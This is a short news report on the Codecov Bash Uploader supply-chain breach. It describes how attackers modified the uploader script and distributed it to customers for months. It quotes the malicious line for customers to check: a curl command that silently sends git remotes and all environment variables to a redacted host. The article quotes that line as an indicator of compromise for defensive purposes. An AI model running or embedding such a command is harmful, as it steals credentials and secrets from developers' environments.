The company’s message does not yet contain all the technical details of the hack, but it is known that the attackers took advantage of the vulnerability in the process of creating Docker images and through it were able to modify the Bash Uploader script. In turn, the infected code was delivered to consumers, with the exception of those using a special version of the product without cloud functionality. The code modification took place for the first time back on January 31st. For at least 2.5 months, an essentially malicious script was distributed from Codecov servers. The access keys to the cloud development tools of the affected customers are highly likely to have leaked.
Codecov clients are advised to check the installed version of the script for the following line:
curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://REDACTED/upload/v2 || true
The consequences of the breach are still difficult to assess: this incident can be qualified as an attack on the supply chain squared. The solution for software developers has been cracked, which means there is a chance that the code of Codecov clients could also be modified. Potential victims include major companies including Atlassian, P&G and GoDaddy. In addition, the Bash Uploader code is open source, distributed under a free license and switched on to other projects for software developers.